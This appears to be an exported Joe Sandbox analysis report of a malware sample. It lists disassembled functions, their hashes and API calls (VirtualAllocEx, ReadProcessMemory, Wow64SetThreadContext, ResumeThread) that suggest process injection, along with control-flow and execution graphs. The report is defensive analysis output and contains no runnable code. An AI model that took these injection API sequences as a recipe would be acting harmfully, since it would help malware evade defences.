                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 9b2b0bbc9c3b3978f5370bd8490baabc76644e4a4b1a1ecbb65acc1296e399a6
                                                                      • Instruction ID: 5549022740e605b65f27415733202b5ea266bb3c97bd548c9c3c442cfdf8241f
                                                                      • Opcode Fuzzy Hash: 9b2b0bbc9c3b3978f5370bd8490baabc76644e4a4b1a1ecbb65acc1296e399a6
                                                                      • Instruction Fuzzy Hash: DB2105B5D002489FDB10DFAAD984ADEBBF4FB48310F10841AE914A7350D774A944CFA4
                                                                      Function 02A8D808 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 312 2a8d808-2a8d80a 313 2a8d810-2a8d8a4 DuplicateHandle 312->313 314 2a8d8ad-2a8d8ca 313->314 315 2a8d8a6-2a8d8ac 313->315 315->314
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A8D7D6,?,?,?,?,?), ref: 02A8D897
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 12ce3fae42130997edb3c6078aaa7aff5f296be7e5202e04b6a27c584068ebd4
                                                                      • Instruction ID: 6b5a017e04231d8a3765aaaac5e6757bc32e3a76ea0657602fa6cae7b50935a8
                                                                      • Opcode Fuzzy Hash: 12ce3fae42130997edb3c6078aaa7aff5f296be7e5202e04b6a27c584068ebd4
                                                                      • Instruction Fuzzy Hash: 5F2103B5D00248AFDB20DFAAD884ADEBFF5FB48320F14841AE914A7250D774AA44CF61
                                                                      Function 0732E008 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0732E088
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: ebb5a4cf78fd06687fb490abce214520d4c1935fa05302285172fbae2c14924e
                                                                      • Instruction ID: ff7781ff969eea0e00658eccfe42fa184a316ca7b2a4afbb0505922202b40b06
                                                                      • Opcode Fuzzy Hash: ebb5a4cf78fd06687fb490abce214520d4c1935fa05302285172fbae2c14924e
                                                                      • Instruction Fuzzy Hash: 502148B1C003599FDB10DFAAC881BEEBBF5FF48310F508429E918A7240C7399901DBA1
                                                                      Function 0732D978 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 318 732d978-732d9c3 320 732d9d3-732da03 Wow64SetThreadContext 318->320 321 732d9c5-732d9d1 318->321 323 732da05-732da0b 320->323 324 732da0c-732da3c 320->324 321->320 323->324
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0732D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: c1fd1f43568d709e2e81c0e6c58d41a6d2d46f2281e1ad98feae09d666e18ad9
                                                                      • Instruction ID: 0c385a86e00357c41d6e837815fda1f0f77bfab14bca771bdd84247554c8d90b
                                                                      • Opcode Fuzzy Hash: c1fd1f43568d709e2e81c0e6c58d41a6d2d46f2281e1ad98feae09d666e18ad9
                                                                      • Instruction Fuzzy Hash: FE2138B1D103098FDB20DFAAC485BAEBBF4EF48320F54842AD459A7240CB789945CFA4
                                                                      Function 0732DE50 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0732DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: a3c2c0858b2acc145371b861bb61af046ba33387cc31a78a10682ed21d38b7cc
                                                                      • Instruction ID: d332200cf3987c31a98e236bed9f0920b1b7fbb1a09552e89bdce03d1547e4e2
                                                                      • Opcode Fuzzy Hash: a3c2c0858b2acc145371b861bb61af046ba33387cc31a78a10682ed21d38b7cc
                                                                      • Instruction Fuzzy Hash: BD2156758003499FDB20DFAAC844BDEBBF5EB48320F108819E519A7250CB35A901CBA1
                                                                      Function 0732D8C0 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: dfe1c33d29bdfb127c99d4f0df038a29e6b90ea3c4c050ec748b73dbd6c0c241
                                                                      • Instruction ID: 22a11c41d927d74b2dbbafe6b751f4da407411ce04bc8ef426ac8c9c91f51778
                                                                      • Opcode Fuzzy Hash: dfe1c33d29bdfb127c99d4f0df038a29e6b90ea3c4c050ec748b73dbd6c0c241
                                                                      • Instruction Fuzzy Hash: BF1158B5D003498FDB20DFAAD8457EEFBF5EB88320F248429D419A7240CB35A945CB94
                                                                      Function 0732DE58 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0732DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 339be0c2cc78e74a95df0834f9a50018a1b99e0ff9e8315bfeb6809875d26a52
                                                                      • Instruction ID: 417f129ac513c247d10c6063b509be2c9e5e146043f21eac8406adf0dfa111e5
                                                                      • Opcode Fuzzy Hash: 339be0c2cc78e74a95df0834f9a50018a1b99e0ff9e8315bfeb6809875d26a52
                                                                      • Instruction Fuzzy Hash: 53115675D003499FDB24DFAAC844BDEBBF5EB48320F108819E519A7250CB35A941CFA0
                                                                      Function 0732D8C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 4ccd875a1ffbb29d436434dfa7cdc658eb175324cccdd666ea7dfa7fac19f53f
                                                                      • Instruction ID: a3ff7437515bf559a933925650c2aeea18ddcd01d00ad4506bb0bd231fd99ccd
                                                                      • Opcode Fuzzy Hash: 4ccd875a1ffbb29d436434dfa7cdc658eb175324cccdd666ea7dfa7fac19f53f
                                                                      • Instruction Fuzzy Hash: D2113AB5D003498FDB24DFAAC8457AEFBF5EB88320F248419D519A7240CB75A941CF94
                                                                      Function 02A8B118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02A8B17E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 97fbc386ea09bb801dcdbd79790c27594cd31f35107a6ca9674557b2b6cb36cd
                                                                      • Instruction ID: e082b2d2bb9c49c7f389f4f7276a62122c5725a6a2f7be99bdb5b605ba814609
                                                                      • Opcode Fuzzy Hash: 97fbc386ea09bb801dcdbd79790c27594cd31f35107a6ca9674557b2b6cb36cd
                                                                      • Instruction Fuzzy Hash: D21113B5C003498FCB20DF9AC884BDEFBF4EB48314F10841AD419A7210C779A545CFA1
                                                                      Function 0B961438 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0B96149D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1351075415.000000000B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_b960000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 49fea4e4069581c02fe535abc0fd7eceb6a158ac1a3f511bcbc4183b7dc520b7
                                                                      • Instruction ID: bddf1d2e76023268b1fe9f3fde9b2c397f8cf5c8d05fef9b94ef852828d3bcee
                                                                      • Opcode Fuzzy Hash: 49fea4e4069581c02fe535abc0fd7eceb6a158ac1a3f511bcbc4183b7dc520b7
                                                                      • Instruction Fuzzy Hash: 4A11F5B58003499FDB20DF9AD845BDEBFF8EB48320F10885AE554A7240C375A944CFA1
                                                                      Function 0B961440 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0B96149D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1351075415.000000000B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_b960000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 4b03d047e188870058b5959a9cc71fd74349d6af8a3e6c5b7428d3b06334bfe7
                                                                      • Instruction ID: 7464384eea132f6993353b1bc229862d0774642d4cfdde04672832c0ac34784a
                                                                      • Opcode Fuzzy Hash: 4b03d047e188870058b5959a9cc71fd74349d6af8a3e6c5b7428d3b06334bfe7
                                                                      • Instruction Fuzzy Hash: BB11D3B58003599FDB20DF9AD985BDEBBF8EB48320F108459E518A7250C375A944CFA5
                                                                      Function 0104D4C4 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81a3273d9f961d6cd1c3cc6932c41dcffe4bf18eaca8da2b36d0f8fe7094e48b
                                                                      • Instruction ID: 55f63783c69ea4deb917cb838fb17fa02b6ebe6320ca2775659a33fdc8115680
                                                                      • Opcode Fuzzy Hash: 81a3273d9f961d6cd1c3cc6932c41dcffe4bf18eaca8da2b36d0f8fe7094e48b
                                                                      • Instruction Fuzzy Hash: 562136B1604200DFDB15DF54D9C0B2ABFA1FB94318F20C1B9E8890B246C736D456CBA2
                                                                      Function 0104D3D8 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ea92b92666f4781b8d49b0232e04cf12df60da929e83b4340d33b6677de01d2
                                                                      • Instruction ID: 7f8eac67e8167aa216b259e10241f100d6f3f1a96ff0ebd66d6b5ac5e9960aa3
                                                                      • Opcode Fuzzy Hash: 5ea92b92666f4781b8d49b0232e04cf12df60da929e83b4340d33b6677de01d2
                                                                      • Instruction Fuzzy Hash: 362121B1604200DFDB05DF54D9C0B5ABBA5FBE8324F20C1B9E9490B246C73AE456CBA2
                                                                      Function 0105D1D4 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f00f81ae8802ce990fdbc647e28f8b5dced577027c01ee2527e812c97cef026
                                                                      • Instruction ID: aa12418dc8b7430ddb8b01cc82c67359fe1468644b22d7139663bd312e045e2a
                                                                      • Opcode Fuzzy Hash: 9f00f81ae8802ce990fdbc647e28f8b5dced577027c01ee2527e812c97cef026
                                                                      • Instruction Fuzzy Hash: 8B21D375604300AFDB95DF94D9C4B16BBA5FB94324F20C5AEDC894B252C336D446CB61
                                                                      Function 0105D01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bb5f56df220acc69a9604da91ed042c335bb93631e88e2c89a8aa58119c5440
                                                                      • Instruction ID: 7be2e0c7005328ed05081746614ab6bf5dd7c53959c4f7ca0fac1e1dcbf363cc
                                                                      • Opcode Fuzzy Hash: 5bb5f56df220acc69a9604da91ed042c335bb93631e88e2c89a8aa58119c5440
                                                                      • Instruction Fuzzy Hash: F921F171604200DFDB55DF54D984B16BBA5EB84214F20C5AAEC894B246C336D807CB62
                                                                      Function 0105D006 Relevance: .1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0aea8175f9e63feaed4a266fb8d36f90b4583829352087b5d37b573ab75d2718
                                                                      • Instruction ID: 04d16bdc901f58c3ea0a4604c88c9c24faa4010482f5bdeb5e48f5a9160a8807
                                                                      • Opcode Fuzzy Hash: 0aea8175f9e63feaed4a266fb8d36f90b4583829352087b5d37b573ab75d2718
                                                                      • Instruction Fuzzy Hash: FB2192755093808FDB56CF64D990715BFB1EB45214F28C5DBD8898B2A7C33A980ACB62
                                                                      Function 0104D3D3 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction ID: 0b400eec5e266f5c67aa5ea4238e6365661c8fb7105913e4b8372ce5e0fe41be
                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction Fuzzy Hash: 8711DFB6504240CFCB06CF54D5C0B56BFB2FB94324F24C2A9D8490B257C33AE456CBA1
                                                                      Function 0104D4BF Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction ID: fca69411071fed69b53e781144474e0092614a6d2944ae40bfe4b24b85f2a514
                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction Fuzzy Hash: E811DFB6504280CFCB06CF54D5C0B16BFB2FB94324F24C6A9D8490B256C336D456CBA1
                                                                      Function 0105D1CF Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                      • Instruction ID: 20d630c910db088803784ea3045808fbc3d0fc17803996275b17c812a69ffc7a
                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                      • Instruction Fuzzy Hash: 9711BB75504280DFCB46CF54C5C0B16BBA2FB84324F24C6AEDC894B296C33AD44ACB61
                                                                      Function 0104D731 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 90e494e8480c3e73aa30675bad0f24703fef432763cf0f1d26f26bb9164c6d8b
                                                                      • Instruction ID: 35f220b57405af8a4e7228d157a03d93ff82dbd580cf61c23333a41d5e9c9770
                                                                      • Opcode Fuzzy Hash: 90e494e8480c3e73aa30675bad0f24703fef432763cf0f1d26f26bb9164c6d8b
                                                                      • Instruction Fuzzy Hash: AA01F7B15043849BF7209A65DCC476AFFD8FF50225F14C5BAED884E282E2389840CBB2
                                                                      Function 0104D730 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8c296ec0e9249e1a36199e005a412d6acda46e0d11c25398c3e094942b550ca
                                                                      • Instruction ID: a1280942ea036aedbea2ab42b4fa2bbefad84201cbbbf5f7e0b64d59260f3576
                                                                      • Opcode Fuzzy Hash: d8c296ec0e9249e1a36199e005a412d6acda46e0d11c25398c3e094942b550ca
                                                                      • Instruction Fuzzy Hash: 64F0C2710043849FE7108A19DCC4B66FFD8EB90334F18C5AAED484E283D2789840CB71

                                                                      Non-executed Functions

                                                                      Function 0730BD19 Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 440ee4fd8fce31542233cff6ef40215e6fe58c8dc10c8d6805479239c14e3e88
                                                                      • Instruction ID: 031a2c8bf4529fecd663fcd350e0592c1740e750aba662e225cbe53a6801c26e
                                                                      • Opcode Fuzzy Hash: 440ee4fd8fce31542233cff6ef40215e6fe58c8dc10c8d6805479239c14e3e88
                                                                      • Instruction Fuzzy Hash: 8D21A1F26047529FDB26AF78E8604D8FBB1EF8221070541A7D044DB2A2D7309899CBD2
                                                                      Function 07305AA0 Relevance: .1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85ea120152c256f2d13ea433821ee04dff60b0c53cf86e18b0488141c33a0e6d
                                                                      • Instruction ID: ba928996c3745a0c21e3f32ce0a19b1ee98f201aa1aba42297da8857be2d37c3
                                                                      • Opcode Fuzzy Hash: 85ea120152c256f2d13ea433821ee04dff60b0c53cf86e18b0488141c33a0e6d
                                                                      • Instruction Fuzzy Hash: 372179B5A00359CFEB18DFA8C468ADDB7B2EF46311F040469D409AB3A0CB35AD85CF81

                                                                      Execution Graph

                                                                      Execution Coverage:9.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:137
                                                                      Total number of Limit Nodes:17
                                                                      execution_graph 42099 64ae628 42100 64ae676 GlobalMemoryStatusEx 42099->42100 42101 64ae6a6 42100->42101 42102 59aaa98 42104 59aaac9 42102->42104 42106 59aabc9 42102->42106 42103 59aaad5 42104->42103 42111 59aad0e 42104->42111 42115 59aad10 42104->42115 42105 59aab15 42119 59ac010 42105->42119 42128 59ac001 42105->42128 42112 59aad1a 42111->42112 42137 59aad50 42111->42137 42146 59aad60 42111->42146 42112->42105 42117 59aad50 2 API calls 42115->42117 42118 59aad60 2 API calls 42115->42118 42116 59aad1a 42116->42105 42117->42116 42118->42116 42120 59ac03b 42119->42120 42162 59ac550 42120->42162 42167 59ac560 42120->42167 42121 59ac0be 42122 59aa110 GetModuleHandleW 42121->42122 42124 59ac0ea 42121->42124 42123 59ac12e 42122->42123 42125 59acee5 CreateWindowExW 42123->42125 42125->42124 42129 59ac010 42128->42129 42134 59ac550 GetModuleHandleW 42129->42134 42135 59ac560 GetModuleHandleW 42129->42135 42130 59ac0be 42131 59ac0ea 42130->42131 42132 59aa110 GetModuleHandleW 42130->42132 42131->42131 42133 59ac12e 42132->42133 42192 59acee5 42133->42192 42134->42130 42135->42130 42138 59aad55 42137->42138 42141 59aad94 42138->42141 42155 59aa110 42138->42155 42141->42112 42142 59aaf98 GetModuleHandleW 42144 59aafc5 42142->42144 42143 59aad8c 42143->42141 42143->42142 42144->42112 42147 59aad71 42146->42147 42150 59aad94 42146->42150 42148 59aa110 GetModuleHandleW 42147->42148 42149 59aad7c 42148->42149 42149->42150 42154 59aafe9 GetModuleHandleW 42149->42154 42150->42112 42151 59aaf98 GetModuleHandleW 42153 59aafc5 42151->42153 42152 59aad8c 42152->42150 42152->42151 42153->42112 42154->42152 42156 59aaf50 GetModuleHandleW 42155->42156 42158 59aad7c 42156->42158 42158->42141 42159 59aafe9 42158->42159 42160 59aa110 GetModuleHandleW 42159->42160 42161 59ab00c 42160->42161 42161->42143 42163 59ac560 42162->42163 42164 59ac60e 42163->42164 42172 59ac6d0 42163->42172 42182 59ac6c0 42163->42182 42168 59ac58d 42167->42168 42169 59ac60e 42168->42169 42170 59ac6d0 GetModuleHandleW 42168->42170 42171 59ac6c0 GetModuleHandleW 42168->42171 42170->42169 42171->42169 42173 59ac6e5 42172->42173 42174 59aa110 GetModuleHandleW 42173->42174 42175 59ac709 42173->42175 42174->42175 42176 59aa110 GetModuleHandleW 42175->42176 42181 59ac8c5 42175->42181 42177 59ac84b 42176->42177 42178 59aa110 GetModuleHandleW 42177->42178 42177->42181 42179 59ac899 42178->42179 42180 59aa110 GetModuleHandleW 42179->42180 42179->42181 42180->42181 42181->42164 42183 59ac6e5 42182->42183 42184 59aa110 GetModuleHandleW 42183->42184 42185 59ac709 42183->42185 42184->42185 42186 59aa110 GetModuleHandleW 42185->42186 42191 59ac8c5 42185->42191 42187 59ac84b 42186->42187 42188 59aa110 GetModuleHandleW 42187->42188 42187->42191 42189 59ac899 42188->42189 42190 59aa110 GetModuleHandleW 42189->42190 42189->42191 42190->42191 42191->42164 42193 59acee9 42192->42193 42194 59acf1d CreateWindowExW 42192->42194 42193->42131 42196 59ad054 42194->42196 42197 1537358 42198 153739e DeleteFileW 42197->42198 42200 15373d7 42198->42200 42201 143d01c 42202 143d034 42201->42202 42203 143d08e 42202->42203 42208 59ad0e8 42202->42208 42212 59aa2f4 42202->42212 42221 59ad0d7 42202->42221 42225 59ade38 42202->42225 42209 59ad10e 42208->42209 42210 59aa2f4 CallWindowProcW 42209->42210 42211 59ad12f 42210->42211 42211->42203 42213 59aa2ff 42212->42213 42214 59adea9 42213->42214 42216 59ade99 42213->42216 42217 59adea7 42214->42217 42250 59aa41c 42214->42250 42234 59ae3d8 42216->42234 42239 59ae4a4 42216->42239 42245 59ae3c8 42216->42245 42222 59ad0e5 42221->42222 42223 59aa2f4 CallWindowProcW 42222->42223 42224 59ad12f 42223->42224 42224->42203 42227 59ade48 42225->42227 42226 59adea9 42228 59adea7 42226->42228 42229 59aa41c CallWindowProcW 42226->42229 42227->42226 42230 59ade99 42227->42230 42229->42228 42231 59ae3d8 CallWindowProcW 42230->42231 42232 59ae3c8 CallWindowProcW 42230->42232 42233 59ae4a4 CallWindowProcW 42230->42233 42231->42228 42232->42228 42233->42228 42236 59ae3ec 42234->42236 42235 59ae478 42235->42217 42254 59ae490 42236->42254 42257 59ae480 42236->42257 42240 59ae462 42239->42240 42241 59ae4b2 42239->42241 42243 59ae490 CallWindowProcW 42240->42243 42244 59ae480 CallWindowProcW 42240->42244 42242 59ae478 42242->42217 42243->42242 42244->42242 42247 59ae3d6 42245->42247 42246 59ae478 42246->42217 42248 59ae490 CallWindowProcW 42247->42248 42249 59ae480 CallWindowProcW 42247->42249 42248->42246 42249->42246 42251 59aa427 42250->42251 42252 59af6c9 42251->42252 42253 59af71a CallWindowProcW 42251->42253 42252->42217 42253->42252 42255 59ae4a1 42254->42255 42261 59af660 42254->42261 42255->42235 42258 59ae490 42257->42258 42259 59ae4a1 42258->42259 42260 59af660 CallWindowProcW 42258->42260 42259->42235 42260->42259 42262 59aa41c CallWindowProcW 42261->42262 42263 59af66a 42262->42263 42263->42255

                                                                      Executed Functions

                                                                      Function 059AAD60 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
